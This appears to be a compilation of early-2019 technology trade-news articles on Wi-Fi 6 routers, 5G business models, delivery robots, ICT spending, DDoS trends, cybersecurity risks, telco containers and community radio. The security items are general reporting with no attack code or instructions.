The 802.11 standard for wi-fi networking is now 20 years old, and each new generation of the standard has provided greater speed than its predecessors. However, the forthcoming 802.11ax -- also known as Wi-Fi 6 -- represents perhaps the greatest change in the relatively short history of this now-ubiquitous technology.
We've covered some of the technical aspects of Wi-Fi 6 in recent months, but the defining feature of this new standard is that as well as providing greater speed, Wi-Fi 6 is also intended to support greater 'density' of networking connections for the millions of permanently-connected smart devices that now form the Internet Of Things (IoT).
As we've reported, the final standard for Wi-Fi 6 isn't expected until late 2019, but a number of manufacturers have already announced plans for new routers based on the current 'Draft 3.0' version of that standard. Netgear certainly isn't the first manufacturer to announce support for Wi-Fi 6, but it is one of the few networking companies that could be described as a household name and the release of its new Nighthawk AX range of routers represents something of a mass-market debut for the technology.
Pricing & options
There are four routers in the new range, with prices starting at £150 ex. VAT (£180 inc. VAT, or $200) for the Nighthawk AX4. That's the entry-level model in the range, but it supports dual-band, 4-stream 802.11ax wi-fi with speeds of up to 3Gbps -- which would be close to top-of-the-range for a conventional 802.11ac router.
The second model is the Nighthawk AX8, which is also a dual-band router, but steps up to 8 streams with speeds of up to 6Gbps, and is priced at £250 ex. VAT (£300 inc. VAT, or $299). The AX8 also adopts an eye-catching 'winged' design, that hides the router's multiple antennae within large plastic fins that project upwards on each side of the unit.
The AX4 and AX8 routers are primarily aimed at home users who want high-speed wi-fi for tasks such as gaming or streaming video on multiple devices. However, it's the two high-end AX12 routers that are most likely to appeal to business users, as they provide even greater speed as well as advanced features that will be suitable for larger offices, public venues such as hotels and restaurants, or even large sports venues.
Delaying the role out of 5G mobile network services could help operators to make a better return on their investment, according to industry experts.
Speaking exclusively to Total Telecom last week, Angus Ward, CEO digital platform solutions, BearingPoint, said that telcos were being rushed into rolling out 5G services by their consumers, despite the fact that 5G use cases in the consumer sector have not yet been proven to be profitable.
Ward believes that over 65 per cent of use case for 5G will sit in the enterprise sector, as that is where customers are willing to pay a premium.
“5G is fundamentally different than what has gone before. There is a lot of fantastic innovation happening at the moment and some of the trials that are ongoing at the moment are showcasing some really fantastic stuff,” he said.
“However, with 3G and 4G – 4G specifically – there was this massive pent up demand for much better on device performance and quality from the consumer. There was no need to challenge the business model – consumers just needed things to run faster. That meant that operators were able to stick with the same use cases that had made them successful in the past.
“If you fast forward to 5G – the GSMA are saying that the build out cost of a 5G network are 4 times as high as they were for 4G. It's a much higher investment cost.
Now, people love their phones, but they don't need them to run 100 times faster than they do on 4G and they are certainly not prepared to pay four times as much for them.
“Our perspective is that 5G is different – there will be much higher costs and that 2/3rds of the use cases will sit in the enterprise market – because that is where people are willing to pay a premium. Yes, there is demand on the consumer side, but a lot of the consumer technology is not there yet – things like AR, VR, the high functioning wearables – they’re not quite there yet.
Telcos now face a challenge to make a sufficient return on their investment for their 5G rollout programmes, as Ward explains.
“The dilemma is that most of the telcos need the consumer side of the business to justify the investment in 5G but the profitable use cases are actually on the enterprise side of things.
“When it comes to the enterprise market, there are a number of challenges. They are new use cases and the question is how do you create those use cases? Typically, you need to have a deep understanding of the industry verticals that you are dealing with and then you need to have the innovation and R&D capacity to imbed connectivity into those solutions.
“From what we see, there is just not enough happening. If you take Smart Cities, there are virtually no cities in the world that are making Smart City initiatives profitable at the moment. The challenge is going to be: How do telcos monetize that space and make a sufficient return on their investment.
FedEx unveils SameDay Bot, an autonomous delivery robo
FedEx's bot will be used for short-range deliveries
FedEx today announced their SameDay Bot, an autonomous delivery robot that will be used for short-distance deliveries. The company is testing the tech at their Memphis headquarters, and are in talks with popular retailers like Walmart and Target to bring the AI to their stores. The SameDay Bot is battery powered with a top speed of 10 mph, can climb stairs, and uses the same LIDAR tech found in autonomous vehicles to navigate.
FedEx is the next delivery service experimenting with robots for short-distance deliveries, following in Amazon's robot tracks with their release of the Scout. Today, the company announced its new FedEx SameDay Bot, which it says will make "last mile" deliveries more efficient.
The bot is powered by batteries and has a top speed of 10 mph. It's autonomous, using cameras and LIDAR sensors to steer itself around people and traffic, similar to the technology found in self-driving cars.
FedEx will initially use the bot internally, shuffling packages between buildings at their Memphis headquarters. If the internal trials are successful, FedEx has ambitions to expand the service to other retailers, enabling them to offer same-day delivery services.
SameDay Bot was built with the help of Dean Kamen, the engineer that created the Segway and the stair-climbing wheelchair. Kamen's influence can be seen in FedEx's robot, which utilizes multiple sets of wheels to climb up steps and curbs.
The bot also has a screen on the front that can communicate with pedestrians, displaying messages like "hello" while a screen on the back indicates the direction it's traveling and if it's about to stop.
FedEx says they are currently negotiating with retailers like AutoZone, Pizza Hut, Target, and Walmart to gauge their need for a delivery system like this. Per their own research, more than 60 percent of customers live within three miles of one of those stores, the perfect radius for this little delivery bot. Soon, your pizza and your spark plugs could both be showing up atop a friendly, wheeled AI.
Samsung, WarnerMedia, Microsoft Join AT&T 5G Program
AT&T has launched a 5G innovation program to jumpstart work with developers, content creators and device makers to push 5G forward.
Participating companies include Microsoft, Magic Leap, Intel, Cisco, Ericsson, Infosys, Nokia, Samsung and WarnerMedia, according to AT&T.
Applications and use cases are expected to span consumer, enterprise and public sectors focusing on education, entertainment, gaming, history, retail and sports.
"What's vital here is to create the right conditions for 5G innovation to flourish," states Andre Fuetsch, president of AT&T Labs and chief technology officer, AT&T Communications. "We believe 5G is the 'yes, you can' network, regardless if you're a global enterprise, small business or consumer.”
As one example of the announced collaboration with other companies, AT&T plans to launch a 5G innovation zone on the Magic Leap campus in Florida so developers and creators can test devices and applications on a 5G network.
Five emerging cybersecurity threats you should take very seriously in 2019
Ransomware isn’t the only cyberthreat your business will face this year. Here are five emerging threats that leaders need to know about.
The cyberthreat landscape continues to evolve, with new threats emerging almost daily. The ability to track and prepare to face these threats can help security and risk management leaders improve their organization's resilience and better support business goals.
The number of high-profile breaches and attacks making headlines has led business leaders to finally take cybersecurity seriously, said Sam Olyaei, senior principal and analyst at Gartner. "Today, not only are business leaders and the business community understanding cybersecurity, they know it's important to their business outcomes and objectives," Olyaei said. "The problem is, there is still a lack of understanding as to why it's important."
Firms must work to bridge the gap between communicating the technical aspects of cybersecurity and the business outcomes, such as customer satisfaction, financial health, and reputation, Olyaei said.Keeping track of new threats and not just established ones like ransomware is key for a strong security posture, said Josh Zelonis, senior analyst at Forrester.
"Whenever we develop our strategies for how we're going to protect our organizations, it's really easy to look at things that you're familiar with, or that you have a good understanding of," Zelonis said. "But if you're not looking ahead, you're building for the problems that already exist, and not setting yourself up for long-term success. And that is really the number one reason why you need to be looking ahead -- to understand how attack techniques are evolving."
Ransomware has been one of the biggest threats impacting businesses in the past two years, exploiting basic vulnerabilities including lack of network segmentation and backups, Gartner's Olyaei said.
Today, threat actors are employing the same variants of ransomware previously used to encrypt data to ransom an organization's resources or systems to mine for cryptocurrency -- a practice known as cryptojacking or cryptomining.
"These are strains of malware that are very similar to strains that different types of ransomware, like Petya and NotPetya, had in place, but instead it's kind of running in the background silently mining for cryptocurrency," Olyaei said. The rise of cryptojacking means the argument that many SMB leaders used in the past -- that their business was too small to be attacked -- goes out the window, Olyaei said. "You still have computers, you still have resources, you still have applications," he added. "And these application systems, computers, and resources can be used to mine for cryptocurrency. That's one of the biggest threats that we see from that standpoint."
2. Internet of Things (IoT) device threats
Companies are adding more and more devices to their infrastructures, said Forrester's Zelonis. "Organizations are going and adding solutions like security cameras and smart container ships, and a lot of these devices don't have how you're going to manage them factored into the design of the products."
Maintenance is often the last consideration when it comes to IoT, Zelonis said. Organizations that want to stay safe should require that all IoT devices be manageable and implement a process for updating them.
3. Geopolitical risks
More organizations are starting to consider where their products are based or implemented and where their data is stored, in terms of cybersecurity risks and regulations, Olyaei said. "When you have regulations like GDPR and threat actors that emerge from nation states like Russia, China, North Korea, and Iran, more and more organizations are beginning to evaluate the intricacies of the security controls of their vendors and their suppliers," Olyaei said. "They're looking at geopolitical risk as a cyber risk, whereas in the past geopolitical was sort of a separate risk function, belonging in enterprise risk."
If organizations do not consider location and geopolitical risk, those that store data in a third party or a nation state that is very sensitive will run the risk of threat actors or nation state resources being used against them, Olyaei said. "If you do that then you also impact the business outcome."
4. Cross-site scripting
Organizations struggle to avoid cross-site scripting (XSS) attacks in the development cycle, Zelonis said. More than 21 percent of vulnerabilities identified by bug bounty programs are XSS areas, making them the leading vulnerability type, Forrester research found.
XSS attacks allow adversaries to use business websites to execute untrusted code in a victim's browser, making it easy for a criminal to interact with a user and steal their cookie information used for authentication to hijack the site without any credentials, Forrester said. Security teams often discount the severity of this attack, Zelonis said. But bug bounty programs can help identify XSS attacks and other weaknesses in your systems, he added.
5. Mobile malware
Mobile devices are increasingly a top attack target -- a trend rooted in poor vulnerability management, according to Forrester. But the analyst firm said many organizations that try to deploy mobile device management (MDM) solutions find that privacy concerns limit adoption.
The biggest pain point in this space is the Android installed base, Zelonis said. "The Google developer site shows that the vast majority of Android devices in the world are running pretty old versions of Android," he said. "And when you look at the motivations of a lot of IoT device manufacturers, it's challenging to get them to continue to support devices and get timely patches, because then you're getting back to mobile issues."
Organizations should ensure employee access to an anti-malware solution, Forrester recommended. Even if it's not managed by the organization, this will alleviate some security concerns.
Report: Cloud and digital service providers fuel ICT spending
Despite blowback from a trade war with China and a slowing global economy, business spending on information and communications technologies (ICT) will continue to flourish, according to a report.
The forecast by International Data Corporation (IDC) predicts that worldwide spending on ICT will reach $4.6 trillion by 2022 with an average growth rate of 4% per year. That spending estimate takes place across hardware, software, services and telecommunications verticals, according to IDC.
Commercial customers will account for around 63.5% of the total spending by 2022 ($2.9 trillion), while consumers make up 36.5% ($1.7 trillion), according to IDC.
he fastest growth segment over the forecast period will come from the professional services vertical (7%), including cloud and digital services providers, which will account for a bigger piece of overall tech spending. IDC said the increase in tech spending was largely due to the explosive growth of the cloud infrastructure providers, which include Google Cloud, Microsoft Azure, IBM, and Amazon Web Services.
The other fastest-growing segments include media (6%), banking (5%), retail (5%), and manufacturing (5%), while the slowest growth in commercial technology budgets will come from the federal government, followed by wholesale and construction firms.
The slowing economy and the trade war between China and the U.S. is putting pressure on companies to increase their technology budgets while also implementing their digital transformations through the use of artificial intelligence and data analytics.
"In the short term, the trade war between the U.S. and China continues to add volatility to the outlook," said Stephen Minton, vice president in IDC's customer insights and analysis group, in a prepared statement. "Some firms are also facing the double whammy of weaker sales in China, an increasingly important export market for the manufacturing industry.
"Meanwhile, the impact in China itself could persist over a longer period of time, with manufacturing and financial services firms being the most exposed."
Despite market maturity, business investments in digital transformation, cloud, and AI will help drive overall U.S. growth of 4.5% over the forecast period, equaling Latin America as the second fastest growing region for total ICT spending behind China.
"In the U.S., the professional services industry is expected to continue with strong technology growth and investments. The appetite for cloud-based delivery, new apps, and tech-fueled services show no signs of slowing, and thus we are optimistic about the growth opportunity for this industry," said Jessica Goepfert, vice president in IDC's customer insights and analysis group, in the statement. "Consumer-driven industries such as retail and hospitality are benefitting from higher wages and disposable incomes.
"In response, firms in this space are working to develop and deliver unforgettable customer interactions. This takes shape as customizable experiences and infusing technology into their operations. For instance, hotels are implementing technology in guest rooms that can be controlled by mobile apps."
Devices supporting Wi-Fi 6 a.k.a 802.11ax are expected out in 2019, but with the standard yet to be ratified, jumping in early might best be left to those with a compelling use case - and those do exist
In five years, all you’re going to find is Wi-Fi 6, or what most wireless experts are still calling 802.11ax. But five years is a long time. If you’re considering an early move toward the most cutting-edge Wi-Fi technology on the market, there are some hurdles that you’ll have to overcome.
The first is the preliminary state of the technology. Every access point (AP) on the market that’s being sold as 11ax or Wi-Fi 6 is pre-standard gear, given that that the Wi-Fi Alliance hasn’t yet finalized the standard. That poses potential interoperability issues down the line, according to analysts. And of course, there are no Wi-Fi 6-ready smartphones, laptops or other client devices available yet.
Why upgrade to 802.11ax?
It’s important to understand why you’re updating, as well, noted Gartner senior principal analyst Bill Menezes. The main reason to upgrade now is futureproofing, given the lack of Wi-Fi 6-capable client devices on the market.
“You’re really just putting it in there because you got a great price on it, or you’ve decided, ‘Well, I may not have the money in five years to upgrade,’” he said.
It’s worth noting, however, that there are particular use cases that could benefit from Wi-Fi 6-ready hardware more than others. The one that comes up more than any other – unsurprisingly, given the technology’s focus on efficiently connecting to large numbers of client devices via a single AP – is the hospitality and entertainment sector. Sports stadiums, convention halls and other large event venues are likely to benefit from Wi-Fi 6’s ability to handle lots of connections per endpoint.
Beyond that, however, there’s little consensus among experts about early adoption of 802.11ax among particular verticals. Some analysts posit a use case for IoT – particularly industrial IoT – using that high connections-per-AP ability to connect sensors together, but others note that Wi-Fi is unlikely to be the preferred connectivity medium for the actual sensors. That’s not to say that edge gateway devices won’t use Wi-Fi to connect back to clouds or data centers, but the gateways themselves are more likely to use slightly more specialized technology – usually some form of low-power WAN – to communicate with the sensors directly.
Compatibility could be an issue for early adopters
Another potential hurdle is the difference between pre-standard hardware and standard-ready hardware. Certain gear being sold as Wi-Fi 6 now might not be guaranteed to fully comply with the final 802.11ax standard, which the Wi-Fi Alliance is expected to finalize near the end of 2019.
Forrester principal analyst Andre Kindness – who argued that it’s probably too early for most businesses to consider a Wi-Fi 6 upgrade absent exceptional circumstances – said that this compatibility issue is an avoidable headache. If you invest in pre-standard hardware, should first talk to your reseller or vendor to make sure it’s not going to be a problem down the road. Multiple analysts urged potential buyers not to take “don’t worry about it” for an answer.
Kindness said, that not all pre-standard gear is going to be backward-compatible.“[Vendors] want to be the first to market, in general," he said. "If you’re spending your R&D money, what are you going to spend it on, creating new products or enhancing the older ones?”
Benefits of 802.11ax
For all that, however, there’s still an outside case to be made for hopping on the Wi-Fi 6 bandwagon now instead of later, particularly for the aforementioned high-density deployment use cases.
Farpoint Group principal and Network World contributor Craig Mathias highlighted that the technical upsides of 802.11ax are eventually going to make the standard pretty well ubiquitous. It isn’t really about higher throughput, according to Mathias. Sure, the theoretical maximum speeds are higher than the current top standard 802.11ac wave 2, but that technology is already more than fast enough to handle the majority of uses to which it is generally put.
Instead, the idea is to provide better responsiveness and lower latency, particularly when a given access point has to handle a higher volume of devices – a crucial consideration in an age when any given person might need to connect half a dozen client devices to the Internet.
“What we try to do is, obviously, make sure that everybody’s got the capacity they need, and 802.11ax is the best vehicle so far for doing that,” he said. “Again, it’s not really available, not really standardized, no real clients, but it is clearly the future, no matter what.”
Nor does the new technology present unusual concerns from a deployment perspective, and standard best practices for Wi-Fi implementation should work well for most companies: a site survey, an alpha deployment, followed by a beta test and a limited live deployment should identify any potential sticking points.
What’s more, the day-to-day management of 802.11ax could wind up being simpler than current-gen Wi-Fi, according to Mathias, though that’s more a function of what individual vendors do with the technology, rather than with the standard itself.
“The trend now is more robust management consoles, but particularly analytics, artificial intelligence and machine learning, so you’ll see those applied to a much greater degree,” he said.
Part of the reason for that is that the new low-level technologies in the new standard are incredibly complicated. These include bi-directional MU-MIMO and BSS coloring. They’re so complicated, in fact, that they’re going to be problematic for network operators to configure on the fly, so AI/ML management techniques are going to become increasingly necessary, according to Mathias.
Report: Two-thirds of DDoS attacks take aim at communications service providers
In what should be a cautionary tale for enterprises, communications service providers were targeted by 65% of the distributed denial-of-service attacks in the third quarter of last year, according to a new report.
While it's not unexpected that DDoS attacks are taking aim at communications service providers (CSPs), it's how they are doing them that is of concern. According to Nexusguard's "Q3 2018 Threat Report," the new methods of attacks exploits the large attack surface of ASN-level (autonomous system number) CSPs by spreading tiny attack traffic across hundreds of IP addresses to avoid detection.
Nexusguard said the continued discovery of new attack patterns should serve as a warning for enterprises to pick service providers with the best DDoS-proof systems.
"Perpetrators are using smaller, bit-and-piece methods to inject junk into legitimate traffic, causing attacks to bypass detection rather than sounding alarms with large, obvious attack spikes,” said Juniman Kasman, chief technology officer for Nexusguard, in a prepared statement. “Diffused traffic can cause communications service providers to easily miss large-scale DDoS attacks in the making, which is why these organizations will need to share the load with the cloud at the network edge to minimize attack impact.”
As a result of the new types of attacks, the attack sizes were 82% smaller in Q3 2018 compared to the same quarter a year ago.
Nexusguard analysts came to the conclusion that the attackers conducted reconnaissance missions to map out the network landscape and identify the mission-critical IP ranges of the targeted CSPs.
After the mapping, the attackers put bits and pieces of junk into legitimate traffic, whose size easily bypassed detection thresholds. Due to the scale involved, mitigating broadly distributed, small-sized attack traffic is more difficult at the CSP level in comparison to the traditional attack methods on a small number of targeted IP addresses.
The “bit-and-piece” attacks observed in the quarter often used open domain name system (DNS) resolvers to launch what is commonly known as DNS Amplification, which includes a targeted IP address receiving only a small number of responses in each campaign. The method of attack makes it difficult for CSPs to trace the infected traffic back to its origins.
Nexusguard said that "black-holing" all traffic to an entire IP prefix would be costly for the CSPs, because black-holing would also block access to a large number of legitimate services.
The report also found that China advanced its lead in global attack origins by contributing more than 23% of the worldwide campaigns, while 15% of the attacks originated in the U.S.
The report also found that Simple Service Discovery Protocol amplification attacks increased 639.8% in Q3 of last year compared to Q2 2018 because of the new patterns targeted at CSPs.
According to a report last month by ABI Research, the security analytics market will reach revenues of $12 billion by 2024.
Government Shutdown Puts U.S. at Major Hacking Risk, Cybersecurity Experts Warn
While President Donald Trump cites a “security crisis at our southern border” as a reason for the longest government shutdown in American history, cybersecurity experts are warning citizens that the federal freeze has put the U.S. at a significant risk for both short and long-term cyberattacks.
“We have laid out the welcome mat to any and all nefarious actors,” Mike O’Malley, VP of strategy at cloud defense firm Radware, told CBS News Wednesday. “Unfortunately, we know all too well from experience that hackers, especially nation-state sponsored, have a high level of patience and are willing to lie in wait for the most opportune moment to strike.”
Corporate data breaches impacted more than 1 billion Americans in 2018. While hackers stole personal information from Marriott International customers or gained access to Facebook users’ unshared photos in corporate breaches, hacking into government agencies’ security systems could have more nefarious repercussions.
According to O’Malley, a hacking could have the most serious impact on the Department of Homeland Security, the State Department, or any other intelligence agency that holds sensitive information that could be compromised in a case of espionage or fraud.
Intelligence agencies are further weakened given the fact that approximately 85% of staff at the National Institute of Standards and Technology and 45% of the Department of Homeland Security’s newly established Cybersecurity and Infrastructure Security Agency have been furloughed, according to a report from security platform Duo Security.
Experts have expressed this growing concern throughout the shutdown. Last week, former homeland security adviser to Barack Obama told Axios, “Cyber threats don’t operate on Washington’s political timetable, and they don’t stop because of a shutdown.”
Cybersecurity, however, isn’t the only safety concern that has been heightened during the shutdown.
Climate scientists at the National Hurricane Center warned that the shutdown could hinder short and long-term planning for natural disaster relief, conservation groups brought up increased fire risks in California, and the American Geophysical Union told Think Progress that it “would interrupt potentially life-saving information and observations from the scientists” working at various agencies.
Furthermore, more than 51,000 TSA employees have been working at airports without pay since December 22, which has resulted in a 55% increase of workers calling in sick, and the closure of security lanes.
World Wide Technology takes on industry challenges for service providers and enterprises
As a systems integrator, World Wide Technology (WWT) has its finger in just about all of the telecommunications pies due to ongoing work in its lab.
WWT was founded in 1990 as a small product reseller company, but it has grown into a technology solutions provider with $10.4 billion in annual revenue and more than 5,000 employees.
While WWT is somewhat closed-mouthed about some of the service providers that it works with in its Advanced Technology Center (ATC) labs, which are used for product demonstrations, proofs of concept, building reference architectures and other tasks, it counts Cisco, VMware, NetApp, Dell EMC, F5 Networks, and HPE among its vendor customers.
"There are probably about 200, 300 different OEMs that we do regular business with, so most of Silicon Valley," said WWT's Neil Anderson, practice manager of mobility, access and IoT solutions, in an interview with FierceTelecom. "We are a systems integrator that focuses on a lot of different spaces in IT; everything from networking to security collaboration, software development, cloud and data center.
"We help very large organizations with everything from upfront consulting about what they may need, and what are the different transitions that need to happen for the business outcomes that their C-levels are looking for, all the way to mass deployment at scale for them."
WWT's market segments include large global service providers, large enterprise customers and public sector customers, according to Anderson.
As service providers travel down their virtualization pathways, they have three basic choices for their transformations: do the work internally, work with a system integrator or adopt open source technologies. Service providers can mix and match those choices as they see fit, but Anderson said WWT works behind the scenes in its labs with even the do-it-yourself service providers.
"You'd be surprised to learn that even some of the major global service providers used us as the back end for a lot of what they are doing themselves," Anderson said. "You'd be surprised that we are a big logistics arm and integrator in the back end helping those guys to scale their businesses."
Read more at:
Containers are a work in progress for some telcos
1/16/19. Source: FierceTelecom
Last year, Kubernetes took center stage in the telecommunications industry as the primary means for managing containers, but there's still work to do.
The use of containers is already underway by telcos such as AT&T and BT, and there's no doubt more service providers will use them going forward.
Containers are lightweight, standalone, executable packages of software code that share an operating system, such as Linux, and can run large distributed applications. Because containers have the bare minimum software that's needed to run an application, they can be more efficient than virtual machines (VMs).
The hyperscale cloud service providers, such as Microsoft Azure, Google and Amazon Web Services, pioneered the initial adoption of container software in their data centers, but the majority of telcos are just starting to explore using them.
A survey last year by IHS Markit, which included cloud service providers and telco service providers, asked service providers what portion of their servers were single tenant, virtualized (with a hypervisor) or containerized, and how they expected that to change in 2019. Respondents said that containerized servers were expected to nearly double, from an average of 12% in 2017 to 23% of the servers by 2019.
While Google-developed Kubernetes is now the hands-down de facto standard for orchestrating and managing containers across public and private clouds, Colt Technology's Mirko Voltolini, head of Network On Demand, said his company isn't ready to jump into containers with both feet.
Voltolini said there currently wasn't a sense of maturity in terms of the tool sets needed to control and orchestrate the life cycle of a container, as apposed to a virtual network function with a VM wrapped around it.
"So containers obviously are ready, but you need to be able to orchestrate containers," he said in an interview with FierceTelecom. "You need to be able to manage the full life cycle of an application in a containerized approach. We don't even have a maturity of orchestration level for the current virtual VM-based virtualized world. There are no off-the-shelf orchestrators that can manage containers for these use-cases.
"Containers are a really nice concept and we're going to move into that at some point. But using containers means we are taking an application, breaking it down into microservices, putting them in containers and then composing services based on that with our orchestrators. I cannot buy anything that does that orchestration today. Could I do something myself? Maybe, but I don't want to do that."
It's worth noting that since Colt's services are directed toward business customers instead of residential end users, its VNFs are different than those used by AT&T or Verizon.
Read more at:
Hyperlocal radio and do-it-yourself networks bring information closer to home
Modern communications technology means one can find anything, anywhere around the world, on the internet and via mobile phones. But people still live in communities and need information that is relevant to them.
By taking a fresh look at community radio – with an FM signal broadcast over a catchment area of only a few kilometres – researchers are finding new and surprising ways to connect remote or rural communities, even in areas where communications may be patchy.
"We think that FM is still a very useful and very important medium, and it deserves a fresh look as to how it works … and how will it interact with … these more recent technologies," said Professor Christopher Csíkszentmihályi, who is leading a project called Grassroot Wavelengths to create a network of community owned and operated radio.
"While it may be relatively old technology now, it is still very relevant in many parts of the world," he said.
Rather than replacing FM radio, new mobile and web technology can extend the medium and offer fusions unexplored by more traditional radio platforms.
"What differentiates these stations from a lot of community radio stations is that they are very highly networked, so they are all going off a strong connection to the internet and mobile telephony," said Prof. Csíkszentmihályi, who is based at the Madeira Interactive Technologies Institute (M-ITI) in Portugal.
The Grassroot Wavelengths project makes FM frequencies available for hyperlocal community radio stations, which can work off a transmitter connected to a mobile phone, broadcasting over a radius of up to 12 km, perhaps covering a neighbourhood, or a village and its surroundings.
Instead of having a studio and a large transmitter, the system can be controlled through speech recognition and a web interface, so a manager can line up a series of programmes, or switch between podcasts or streamed material, and live calls to a chat programme, in a similar way to hosting a conference call. People can listen on an FM receiver or via streaming, and can call the station or interact with it via the web.